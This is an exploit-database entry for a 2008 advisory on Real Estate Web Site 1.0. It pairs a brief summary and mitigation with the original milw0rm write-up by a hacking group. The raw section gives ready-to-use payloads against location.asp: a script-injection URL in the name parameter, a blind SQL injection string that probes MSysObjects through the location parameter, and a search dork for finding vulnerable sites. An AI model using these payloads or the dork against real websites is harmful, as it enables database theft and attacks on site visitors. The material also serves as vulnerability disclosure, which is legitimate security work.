Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities

vendor:

Real Estate Web Site

by:

JosS

7.5

CVSS

HIGH

SQL Injection and Cross Site Scripting

89, 79

CWE

Product Name: Real Estate Web Site

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:real-estate-website:real_estate_web_site

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities

Real Estate Web Site 1.0 is vulnerable to multiple remote vulnerabilities. An attacker can exploit these vulnerabilities to inject malicious SQL commands and execute arbitrary JavaScript code in the browser of an unsuspecting user. The vulnerable file is location.asp. An attacker can inject malicious SQL commands by sending a specially crafted HTTP request to the vulnerable file. An attacker can also inject arbitrary JavaScript code by sending a specially crafted HTTP request to the vulnerable file.

Mitigation:

Input validation should be used to prevent SQL injection and Cross Site Scripting attacks.

Source

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+           Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities       +==--
--==+====================================================================================+==--
                          - dreaming of necessity is reason to comply -


[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com
[~] EspSeC & Hack0wn!.

[~] Software: Real Estate Web Site 1.0
[~] HomePage: http://www.real-estate-website.org/
[~] Exploit: Multiple Remote Vulnerabilities [High]

[~] Dork: "powered by real-estate-website"

[+] Cross Site Scripting:

[~] Vuln file: location.asp
[~] Exploit: http://localhost/PATH/location.asp?name=[XSS]
[~] Example: http://localhost/PATH/location.asp?name="><script>alert('JosS')</script>

[+] Remote SQL Injection:

[~] Vuln file: location.asp
[~] Exploit: http://localhost/PATH/location.asp?name=JosS&location=[SQL]
[~] Example: IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-06-09]